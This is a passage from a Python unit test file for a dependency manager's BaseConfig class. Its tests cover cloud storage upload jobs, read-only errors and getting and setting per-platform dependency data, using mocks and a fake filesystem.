expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsSuccessMultiplePendingDepsOneCloudStorageCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [False, True]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.final_dependencies.copy()
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.final_dependencies, config._config_data)
self.assertTrue(config._IsDirty())
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = [mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path)]
self.assertTrue(config.ExecuteUpdateJobs(force=True))
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.final_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.final_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testUpdateCloudStorageDependenciesReadOnlyConfig(
self, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path)
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path')
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path', version='1.2.3')
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path', execute_job=False)
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path', version='1.2.3', execute_job=False)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testUpdateCloudStorageDependenciesMissingDependency(
self, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path')
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', version='1.2.3')
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', execute_job=False)
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', version='1.2.3', execute_job=False)
@mock.patch('dependency_manager.uploader.cloud_storage')
@mock.patch('dependency_manager.base_config.cloud_storage')
def testUpdateCloudStorageDependenciesWrite(
self, base_config_cs_mock, uploader_cs_mock):
expected_dependencies = self.dependencies
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertFalse(config._IsDirty())
self.assertEqual(expected_dependencies, config._config_data)
base_config_cs_mock.CalculateHash.return_value = self.new_dep_hash
uploader_cs_mock.Exists.return_value = False
expected_dependencies = self.new_dependencies
config.AddCloudStorageDependencyUpdateJob(
'dep1', 'plat2', self.new_dep_path, execute_job=True)
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_dependencies, config._config_data)
# check that file contents has been updated
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.new_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
expected_dependencies = self.final_dependencies
base_config_cs_mock.CalculateHash.return_value = self.final_dep_hash
config.AddCloudStorageDependencyUpdateJob(
'dep2', 'plat1', self.final_dep_path, execute_job=True)
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_dependencies, config._config_data)
# check that file contents has been updated
expected_file_lines = list(self.final_expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
@mock.patch('dependency_manager.uploader.cloud_storage')
@mock.patch('dependency_manager.base_config.cloud_storage')
def testUpdateCloudStorageDependenciesNoWrite(
self, base_config_cs_mock, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path')
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', version='1.2.3')
expected_dependencies = self.dependencies
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_dependencies, config._config_data)
base_config_cs_mock.CalculateHash.return_value = self.new_dep_hash
uploader_cs_mock.Exists.return_value = False
expected_dependencies = self.new_dependencies
config.AddCloudStorageDependencyUpdateJob(
'dep1', 'plat2', self.new_dep_path, execute_job=False)
self.assertTrue(config._IsDirty())
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_dependencies, config._config_data)
# check that file contents have not been updated.
expected_file_lines = list(self.expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
expected_dependencies = self.final_dependencies
base_config_cs_mock.CalculateHash.return_value = self.final_dep_hash
config.AddCloudStorageDependencyUpdateJob(
'dep2', 'plat1', self.final_dep_path, execute_job=False)
self.assertTrue(config._IsDirty())
self.assertEqual(expected_dependencies, config._config_data)
# check that file contents have not been updated.
expected_file_lines = list(self.expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
class BaseConfigDataManipulationUnittests(fake_filesystem_unittest.TestCase):
def setUp(self):
self.addTypeEqualityFunc(uploader.CloudStorageUploader,
uploader.CloudStorageUploader.__eq__)
self.setUpPyfakefs()
self.cs_bucket = 'bucket1'
self.cs_base_folder = 'dependencies_folder'
self.cs_hash = 'hash12'
self.download_path = '../../relative/dep1/path2'
self.local_paths = ['../../../relative/local/path21',
'../../../relative/local/path22']
self.platform_dict = {'cloud_storage_hash': self.cs_hash,
'download_path': self.download_path,
'local_paths': self.local_paths}
self.dependencies = {
'dep1': {
'cloud_storage_bucket': self.cs_bucket,
'cloud_storage_base_folder': self.cs_base_folder,
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': self.platform_dict
}
},
'dep2': {
'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.file_path = os.path.abspath(os.path.join(
'path', 'to', 'config', 'file'))
self.expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1",',
'"local_paths": [', '"../../../relative/local/path11",',
'"../../../relative/local/path12"', ']', '},',
'"plat2": {', '"cloud_storage_hash": "hash12",',
'"download_path": "../../relative/dep1/path2",',
'"local_paths": [', '"../../../relative/local/path21",',
'"../../../relative/local/path22"', ']',
'}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash21",',
'"download_path": "../../relative/dep2/path1",',
'"local_paths": [', '"../../../relative/local/path31",',
'"../../../relative/local/path32"', ']', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
def testSetPlatformDataFailureNotWritable(self):
config = dependency_manager.BaseConfig(self.file_path)
self.assertRaises(
dependency_manager.ReadWriteError, config._SetPlatformData,
'dep1', 'plat1', 'cloud_storage_bucket', 'new_bucket')
self.assertEqual(self.dependencies, config._config_data)
def testSetPlatformDataFailure(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config._SetPlatformData, 'missing_dep',
'plat2', 'cloud_storage_bucket', 'new_bucket')
self.assertEqual(self.dependencies, config._config_data)
self.assertRaises(ValueError, config._SetPlatformData, 'dep1',
'missing_plat', 'cloud_storage_bucket', 'new_bucket')
self.assertEqual(self.dependencies, config._config_data)
def testSetPlatformDataCloudStorageBucketSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'new_bucket',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'cloud_storage_bucket',
'new_bucket')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataCloudStorageBaseFolderSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'new_dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'cloud_storage_base_folder',
'new_dependencies_folder')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataHashSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'new_hash',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'cloud_storage_hash',
'new_hash')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataDownloadPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../new/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'download_path',
'../../new/dep1/path2')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataLocalPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../new/relative/local/path21',
'../../new/relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'local_paths',
['../../new/relative/local/path21',
'../../new/relative/local/path22'])
self.assertEqual(updated_cs_dependencies, config._config_data)
def testGetPlatformDataFailure(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config._GetPlatformData, 'missing_dep',
'plat2', 'cloud_storage_bucket')
self.assertEqual(self.dependencies, config._config_data)
self.assertRaises(ValueError, config._GetPlatformData, 'dep1',
'missing_plat', 'cloud_storage_bucket')
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataDictSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.platform_dict,
config._GetPlatformData('dep1', 'plat2'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataCloudStorageBucketSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.cs_bucket, config._GetPlatformData(
'dep1', 'plat2', 'cloud_storage_bucket'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataCloudStorageBaseFolderSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.cs_base_folder, config._GetPlatformData(
'dep1', 'plat2', 'cloud_storage_base_folder'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataHashSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.cs_hash, config._GetPlatformData(
'dep1', 'plat2', 'cloud_storage_hash'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataDownloadPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.download_path, config._GetPlatformData(
'dep1', 'plat2', 'download_path'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataLocalPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.local_paths, config._GetPlatformData(
'dep1', 'plat2', 'local_paths'))
self.assertEqual(self.dependencies, config._config_data)
class BaseConfigTest(unittest.TestCase):
""" Subclassable unittests for BaseConfig.
For subclasses: override setUp, GetConfigDataFromDict,
and EndToEndExpectedConfigData as needed.
setUp must set the following properties:
self.config_type: String returnedd from GetConfigType in config subclass.
self.config_class: the class for the config subclass.
self.config_module: importable module for the config subclass.
self.empty_dict: expected dictionary for an empty config, as it would be
stored in a json file.
self.one_dep_dict: example dictionary for a config with one dependency,
as it would be stored in a json file.
"""
def setUp(self):
self.config_type = 'BaseConfig'
self.config_class = dependency_manager.BaseConfig
self.config_module = 'dependency_manager.base_config'
self.empty_dict = {'config_type': self.config_type,
'dependencies': {}}
dependency_dict = {
'dep': {
'cloud_storage_base_folder': 'cs_base_folder1',
'cloud_storage_bucket': 'bucket1',
'file_info': {
'plat1_arch1': {
'cloud_storage_hash': 'hash111',
'download_path': 'download_path111',
'cs_remote_path': 'cs_path111',
'version_in_cs': 'version_111',
'local_paths': ['local_path1110', 'local_path1111']
},
'plat1_arch2': {
'cloud_storage_hash': 'hash112',
'download_path': 'download_path112',
'cs_remote_path': 'cs_path112',
'local_paths': ['local_path1120', 'local_path1121']
},
'win_arch1': {
'cloud_storage_hash': 'hash1w1',
'download_path': 'download\\path\\1w1',
'cs_remote_path': 'cs_path1w1',
'local_paths': ['local\\path\\1w10', 'local\\path\\1w11']
},
'all_the_variables': {
'cloud_storage_hash': 'hash111',
'download_path': 'download_path111',
'cs_remote_path': 'cs_path111',
'version_in_cs': 'version_111',
'path_in_archive': 'path/in/archive',
'local_paths': ['local_path1110', 'local_path1111']
}
}
}
}
self.one_dep_dict = {'config_type': self.config_type,
'dependencies': dependency_dict}
def GetConfigDataFromDict(self, config_dict):
return config_dict.get('dependencies', {})
@mock.patch('os.path')
@mock.patch('__builtin__.open')
def testInitBaseProperties(self, open_mock, path_mock):
# Init is not meant to be overridden, so we should be mocking the
# base_config's json module, even in subclasses.
json_module = 'dependency_manager.base_config.json'
with mock.patch(json_module) as json_mock:
json_mock.load.return_value = self.empty_dict.copy()
config = self.config_class('file_path')
self.assertEqual('file_path', config._config_path)
self.assertEqual(self.config_type, config.GetConfigType())
self.assertEqual(self.GetConfigDataFromDict(self.empty_dict),
config._config_data)
@mock.patch('dependency_manager.dependency_info.DependencyInfo')
@mock.patch('os.path')
@mock.patch('__builtin__.open')
def testInitWithDependencies(self, open_mock, path_mock, dep_info_mock):
# Init is not meant to be overridden, so we should be mocking the
# base_config's json module, even in subclasses.
json_module = 'dependency_manager.base_config.json'
with mock.patch(json_module) as json_mock:
json_mock.load.return_value = self.one_dep_dict
config = self.config_class('file_path')
self.assertEqual('file_path', config._config_path)
self.assertEqual(self.config_type, config.GetConfigType())
self.assertEqual(self.GetConfigDataFromDict(self.one_dep_dict),
config._config_data)
def testFormatPath(self):
self.assertEqual(None, self.config_class._FormatPath(None))
self.assertEqual('', self.config_class._FormatPath(''))
self.assertEqual('some_string',
self.config_class._FormatPath('some_string'))
expected_path = os.path.join('some', 'file', 'path')
self.assertEqual(expected_path,
self.config_class._FormatPath('some/file/path'))
self.assertEqual(expected_path,
self.config_class._FormatPath('some\\file\\path'))
@mock.patch('dependency_manager.base_config.json')
@mock.patch('dependency_manager.dependency_info.DependencyInfo')
@mock.patch('os.path.exists')
@mock.patch('__builtin__.open')
def testIterDependenciesError(
self, open_mock, exists_mock, dep_info_mock, json_mock):
# Init is not meant to be overridden, so we should be mocking the
# base_config's json module, even in subclasses.
json_mock.load.return_value = self.one_dep_dict
config = self.config_class('file_path', writable=True)
self.assertEqual(self.GetConfigDataFromDict(self.one_dep_dict),
config._config_data)
self.assertTrue(config._writable)
with self.assertRaises(dependency_manager.ReadWriteError):
for _ in config.IterDependencyInfo():
pass
@mock.patch('dependency_manager.base_config.json')
@mock.patch('dependency_manager.dependency_info.DependencyInfo')
@mock.patch('os.path.exists')
@mock.patch('__builtin__.open')
def testIterDependencies(
self, open_mock, exists_mock, dep_info_mock, json_mock):
json_mock.load.return_value = self.one_dep_dict
config = self.config_class('file_path')
self.assertEqual(self.GetConfigDataFromDict(self.one_dep_dict),
config._config_data)
expected_dep_info = ['dep_info0', 'dep_info1', 'dep_info2']
dep_info_mock.side_effect = expected_dep_info
expected_calls = [
mock.call('dep', 'plat1_arch1', 'file_path', cs_bucket='bucket1',
cs_hash='hash111', download_path='download_path111',
cs_remote_path='cs_path111',
local_paths=['local_path1110', 'local_path1111']),
mock.call('dep', 'plat1_arch1', 'file_path', cs_bucket='bucket1',
cs_hash='hash112', download_path='download_path112',
cs_remote_path='cs_path112',
local_paths=['local_path1120', 'local_path1121']),
mock.call('dep', 'win_arch1', 'file_path', cs_bucket='bucket1',
cs_hash='hash1w1',
download_path=os.path.join('download', 'path', '1w1'),
cs_remote_path='cs_path1w1',
local_paths=[os.path.join('download', 'path', '1w10'),
os.path.join('download', 'path', '1w11')])]
deps_seen = []
for dep_info in config.IterDependencyInfo():
deps_seen.append(dep_info)
dep_info_mock.assert_call_args(expected_calls)
self.assertItemsEqual(expected_dep_info, deps_seen)
| 51.918066 | 80 | 0.647479 | 8,183 | 77,306 | 5.770011 | 0.036295 | 0.074975 | 0.028719 | 0.027957 | 0.904842 | 0.889677 | 0.8768 | 0.874026 | 0.851978 | 0.839737 | 0 | 0.012034 | 0.237899 | 77,306 | 1,488 | 81 | 51.952957 | 0.789392 | 0.020115 | 0 | 0.814433 | 0 | 0 | 0.145175 | 0.066524 | 0 | 0 | 0 | 0 | 0.238586 | 1 | 0.037555 | false | 0.000736 | 0.005891 | 0.000736 | 0.046392 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.